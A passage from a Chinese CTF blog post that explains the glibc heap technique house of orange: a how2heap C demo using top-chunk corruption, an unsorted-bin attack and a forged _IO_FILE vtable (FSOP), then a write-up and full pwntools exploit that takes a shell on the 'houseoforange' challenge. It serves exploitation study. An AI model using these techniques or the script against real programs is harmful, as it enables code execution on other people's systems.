class="comment">//top=&amp;top_chunk</span></span><br><span class="line">    top[<span class="number">1</span>] = <span class="number">0xc01</span>;<span class="comment">//top_chunk.size=0xc01 这里，topchunk+size后的地址必须是页对齐的，prev_inuse必须要设置</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    p2 = <span class="built_in">malloc</span>(<span class="number">0x1000</span>);<span class="comment">//malloc一个比top_chunk.size大的chunk，此时0xc01的旧top_chunk就会被放到	unsortedbin中去</span></span><br><span class="line"></span><br><span class="line">    io_list_all = top[<span class="number">2</span>] + <span class="number">0x9a8</span>;<span class="comment">//top的fd+0x9a8就等于io_list_all在libc中的地址</span></span><br><span class="line"></span><br><span class="line">    top[<span class="number">3</span>] = io_list_all - <span class="number">0x10</span>;<span class="comment">//把top的bk设置成io_list_all-0x10处，用于bck-&gt;fd = unsorted_chunks (av)这一任意写，此时写上去的正好是main_arena.top的地址(&amp;main_arena.top)</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">memcpy</span>( ( <span class="keyword">char</span> *) top, <span class="string">"/bin/sh\x00"</span>, <span class="number">8</span>);<span class="comment">// 将/bin/sh写到top_chunk上面</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    top[<span class="number">1</span>] = <span class="number">0x61</span>;<span class="comment">//在后面malloc(10)的时候，把chunk放到对应的chain处</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    _IO_FILE *fp = (_IO_FILE *) top;</span><br><span class="line">    <span class="comment">/////////////////////////////////////////////////////////////这里就是FSOP那一套</span></span><br><span class="line">    fp-&gt;_mode = <span class="number">0</span>; <span class="comment">// top+0xc0</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    fp-&gt;_IO_write_base = (<span class="keyword">char</span> *) <span class="number">2</span>; <span class="comment">// top+0x20</span></span><br><span class="line">    fp-&gt;_IO_write_ptr = (<span class="keyword">char</span> *) <span class="number">3</span>; <span class="comment">// top+0x28</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">size_t</span> *jump_table = &amp;top[<span class="number">12</span>]; <span class="comment">// controlled memory</span></span><br><span class="line">    jump_table[<span class="number">3</span>] = (<span class="keyword">size_t</span>) &amp;winner;</span><br><span class="line">    *(<span class="keyword">size_t</span> *) ((<span class="keyword">size_t</span>) fp + <span class="keyword">sizeof</span>(_IO_FILE)) = (<span class="keyword">size_t</span>) jump_table; <span class="comment">// top+0xd8</span></span><br><span class="line">	<span class="comment">///////////////////////////////////////////////////////////////////////////////</span></span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">10</span>);<span class="comment">//malloc(0x10),size不相等时触发任意写，并在任意写之后，由于unsortedbin-&gt;bk指向的是io_list_all-0x10，此处的对应的size为0，然后就会触发malloc_printerr</span></span><br><span class="line">    <span class="comment">//触发malloc_printerr就会触发_IO_flush_all_lockp，之后通过chain，FSOP成功(这里能通过chain劫持成功的原因也是因为main_arena上对应偏移处的_mode值不为0)</span></span><br><span class="line">    <span class="comment">//之后就会去执行我们的winner了，而且关键是IO_FILE对于函数的调用是类似于f(ptr)这样调用的，所以最后执行的时候就是_IO_OVERFLOW(fp, EOF)=&gt;system(&amp;top)</span></span><br><span class="line">    <span class="comment">//然而此时top上的字符串是/bin/sh，所以就会getshell</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">winner</span><span class="params">(<span class="keyword">char</span> *ptr)</span></span></span><br><span class="line"><span class="function"></span>&#123; </span><br><span class="line">    system(ptr);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>由于源how2heap上的代码注释太多，要是对具体有疑问的推荐去看一下源代码上的注释，我这个主要是总结用，还有以后参考用</p>
<p>整个过程是一个很巧妙的过程，没有通过free，就是通过top_chunk和unsortedbin attack实现了这个利用，全程也不是特别难理解，我的调试过程就是看了一下到底是哪出错调用的malloc_printerr</p>
<h1 id="houseoforange"><a href="#houseoforange" class="headerlink" title="houseoforange"></a>houseoforange</h1><h2 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h2><h3 id="build"><a href="#build" class="headerlink" title="build"></a>build</h3><p><img src="/2020/03/15/how2heap-house-of-orange-houseoforange/1584105896359.png" alt="1584105896359"></p>
<p>最多只能build 4次，对应的chunk联系如下图所示</p>
<p><img src="/2020/03/15/how2heap-house-of-orange-houseoforange/1584105957540.png" alt="1584105957540"></p>
<p>其中Orange和price_color_chunk都是固定大小的，而且price_color_chunk是calloc出来的chunk</p>
<p>name是我们自己控制大小的一个chunk，最大可为0x1000</p>
<h3 id="see"><a href="#see" class="headerlink" title="see"></a>see</h3><p><img src="/2020/03/15/how2heap-house-of-orange-houseoforange/1584106502771.png" alt="1584106502771"></p>
<p>基本就是打印我们的name还有price，加上一个我们指定颜色的橘子</p>
<h3 id="upgrade"><a href="#upgrade" class="headerlink" title="upgrade"></a>upgrade</h3><p><img src="/2020/03/15/how2heap-house-of-orange-houseoforange/1584106661589.png" alt="1584106661589"></p>
<p>最多只允许upgrade两次，其中更新时的lenth是我们自己输出的，存在一个溢出，然后就是更新price和color</p>
<h2 id="漏洞分析-amp-Exploit"><a href="#漏洞分析-amp-Exploit" class="headerlink" title="漏洞分析&amp;Exploit"></a>漏洞分析&amp;Exploit</h2><p>漏洞点应该说很容易理解，就是upgrade中的overflow，主要就在于我们应该怎么利用。首先程序没有free，所以很多利用都没办法下手了，但是前面刚好学到了<code>house_of_orange</code>，是一个不需要用free即可实现的漏洞，再来看</p>
<p>build中的chunk申请顺序是：<code>malloc(0x10);malloc(len);calloc(8)</code></p>
<p>然后我们的溢出产生在第二个chunk上，可以溢出到calloc出来的chunk还有topchunk</p>
<p>所以这里先build一个house来修改topchunk的size，和前面<code>house_of_orange.c</code>中一样，设置时保持top+size+0x20页对齐，用于后续利用</p>
<p>设置好之后build第二个house，此时指定name为0x1000大小，即可把原来的topchunk放到unsortedbin</p>
<p>这个时候再进行第三次build，指定name稍微小一点，保证这次build出来的house都是从top中切出来的，然后就可以进行溢出修改、leak的操作了</p>
<p>最后一次build触发FSOP即可……..?是不是还少了点什么，因为我们FSOP的时候需要吧vtable指向一个我们可以控制的地方，但是我还没有leak heap或者PIE啊….这怎么办，后来再查阅wp的时候知道了通过切割largechunk时残留的fd_nextsize和bk_nextsize leak的操作….说实话因为largebin在写题的时候用到的少所以没有想到XD…记下来免得以后不记得</p>
<p>PS：顺带记一下<code>fd_nextsize</code>和<code>bk_nextsize</code>会被清空的情况</p>
<ol>
<li>从unsortedbin中唯一last remainder中切出来的时候(malloc.c:3494)</li>
<li>从largebin中切割出的remainder放入unsortedbin时，如果remainder的size仍是属于largebin的，就将这两个ptr清空<br>(malloc.c:3645)（我们最后堆地址泄露就是通过从这切出来的large victim chunk）</li>
<li>一个属于largesize的chunk，free被链入unsortedbin时</li>
</ol>
<h2 id="完整EXP"><a href="#完整EXP" class="headerlink" title="完整EXP"></a>完整EXP</h2><p>有了上面思路之后写WP就很好说了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> __future__ <span class="keyword">import</span> print_function</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">binary = <span class="string">'./houseoforange'</span>	<span class="comment">#binary's name here</span></span><br><span class="line">context.binary = binary		<span class="comment">#context here</span></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">pty = process.PTY</span><br><span class="line">p = process(binary, aslr = <span class="number">1</span>, stdin=pty, stdout=pty)	<span class="comment">#process option here</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">Host =</span></span><br><span class="line"><span class="string">Port =</span></span><br><span class="line"><span class="string">p = remote(Host,Port)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">elf = ELF(binary)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">my_u64 = <span class="keyword">lambda</span> x: u64(x.ljust(<span class="number">8</span>, <span class="string">'\x00'</span>))</span><br><span class="line">my_u32 = <span class="keyword">lambda</span> x: u32(x.ljust(<span class="number">4</span>, <span class="string">'\x00'</span>))</span><br><span class="line">global_max_fast=<span class="number">0x3c67f8</span></span><br><span class="line">codebase = <span class="number">0x555555554000</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">loginfo</span><span class="params">(what=<span class="string">''</span>,address=<span class="number">0</span>)</span>:</span></span><br><span class="line">	log.info(<span class="string">"\033[1;36m"</span> + what + <span class="string">'-----&gt;'</span> + hex(address) + <span class="string">"\033[0m"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># todo here</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">build</span><span class="params">(length,name,price,color)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">	p.send(<span class="string">'1'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'of name :'</span>)</span><br><span class="line">	p.send(str(length))</span><br><span class="line">	p.recvuntil(<span class="string">'Name :'</span>)</span><br><span class="line">	p.send(name)</span><br><span class="line">	p.recvuntil(<span class="string">'Price of Orange:'</span>)</span><br><span class="line">	p.send(str(price))</span><br><span class="line">	p.recvuntil(<span class="string">'Color of Orange:'</span>)</span><br><span class="line">	p.send(str(color))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">upgrade</span><span class="params">(length,name,price,color)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">	p.send(<span class="string">'3'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'of name :'</span>)</span><br><span class="line">	p.send(str(length))</span><br><span class="line">	p.recvuntil(<span class="string">'Name:'</span>)</span><br><span class="line">	p.send(name)</span><br><span class="line">	p.recvuntil(<span class="string">'Price of Orange:'</span>)</span><br><span class="line">	p.send(str(price))</span><br><span class="line">	p.recvuntil(<span class="string">'Color of Orange:'</span>)</span><br><span class="line">	p.send(str(color))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">see</span><span class="params">()</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">	p.send(<span class="string">'2'</span>)</span><br><span class="line"></span><br><span class="line">build(<span class="number">0x10</span>,<span class="string">'a'</span>*<span class="number">0x10</span>,<span class="number">1</span>,<span class="number">0xDDAA</span>)<span class="comment">#0x20 0x20 0x20 0x20fa1</span></span><br><span class="line">payload=<span class="string">'a'</span>*<span class="number">0x18</span>+p64(<span class="number">0x21</span>)+p64(<span class="number">0xddaa00000001</span>)+p64(<span class="number">0</span>)*<span class="number">2</span>+p64(<span class="number">0xfa1</span>)</span><br><span class="line">upgrade(<span class="number">0x40</span>,payload,<span class="number">1</span>,<span class="number">0xDDAA</span>)</span><br><span class="line">build(<span class="number">0x1000</span>,<span class="string">'\x00'</span>*<span class="number">0x1000</span>,<span class="number">1</span>,<span class="number">0xDDAA</span>)</span><br><span class="line">build(<span class="number">0x400</span>,<span class="string">'*'</span>*<span class="number">0x8</span>,<span class="number">1</span>,<span class="number">0xDDAA</span>)<span class="comment">#when the size is largesize, the split victim chunk will remain the fd_nextsize&amp;bk_nextsize</span></span><br><span class="line"></span><br><span class="line">see()</span><br><span class="line">p.recvuntil(<span class="string">"********"</span>)</span><br><span class="line">libc_base=my_u64(p.recv(<span class="number">6</span>))<span class="number">-0x3c5188</span></span><br><span class="line">loginfo(<span class="string">"libc_base:"</span>,libc_base)</span><br><span class="line"></span><br><span class="line">upgrade(<span class="number">0x10</span>,<span class="string">'*'</span>*<span class="number">0x10</span>,<span class="number">1</span>,<span class="number">0xDDAA</span>)</span><br><span class="line">see()</span><br><span class="line">p.recvuntil(<span class="string">'****************'</span>)</span><br><span class="line">heap_base=my_u64(p.recv(<span class="number">6</span>))<span class="number">-0xc0</span></span><br><span class="line">loginfo(<span class="string">"heap_base"</span>,heap_base)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">'\x00'</span>*<span class="number">0x408</span>+p64(<span class="number">0x21</span>)+p64(<span class="number">0xddaa00000010</span>)+p64(<span class="number">0</span>)+<span class="string">'/bin/sh\x00'</span>+p64(<span class="number">0x61</span>)+p64(<span class="number">0</span>)+p64(libc_base+<span class="number">0x3c5520</span><span class="number">-0x10</span>)</span><br><span class="line">payload+=(p64(<span class="number">0</span>)+p64(<span class="number">1</span>)).ljust(<span class="number">0xb0</span>,<span class="string">'\x00'</span>)+p64(<span class="number">0</span>)</span><br><span class="line">payload=payload.ljust(<span class="number">0xc8</span>,<span class="string">'\x00'</span>)+p64(heap_base+<span class="number">0x5c0</span>)+p64(<span class="number">0</span>)+p64(libc.symbols[<span class="string">'system'</span>]+libc_base)</span><br><span class="line"></span><br><span class="line">upgrade(len(payload),payload,<span class="number">1</span>,<span class="number">0xDDAA</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">p.send(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"><span class="string">'''libc 2.23 x64</span></span><br><span class="line"><span class="string">0x45216 execve("/bin/sh", rsp+0x30, environ)constraints:  rax == NULL</span></span><br><span class="line"><span class="string">0x4526a execve("/bin/sh", rsp+0x30, environ)constraints:  [rsp+0x30] == NULL</span></span><br><span class="line"><span class="string">0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints:  [rsp+0x50] == NULL</span></span><br><span class="line"><span class="string">0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints:  [rsp+0x70] == NULL</span></span><br><span class="line"><span class="string">req = dest - old_top - 4*sizeof(long)</span></span><br><span class="line"><span class="string">fastbin addree to size： (offset_to_fastbinY/8+2)&lt;&lt;(4 or 3)</span></span><br><span class="line"><span class="string">largebin chunksize:0x410|0x450|0x490|0x4C0...</span></span><br><span class="line"><span class="string">'''</span></span><br></pre></td></tr></table></figure>


      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

  </div>

  
  <nav class="pagination">
    <span class="page-number current">1</span><a class="page-number" href="/page/2/">2</a><a class="page-number" href="/page/3/">3</a><a class="extend next" rel="next" href="/page/2/"><i class="fa fa-angle-right" aria-label="Next page"></i></a>
  </nav>



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Coldshield"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">Coldshield</p>
  <div class="site-description" itemprop="description">分享一些bin学习日常</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">23</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Coldshield</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> v4.2.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Theme – <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.7.2
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('https://cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : true,
      notify     : false,
      appId      : 'APq34QYuAOTUtOPWMtySvyvt-gzGzoHsz',
      appKey     : 'xRjoMerK1OFN4Lad4pyXT0Bs',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>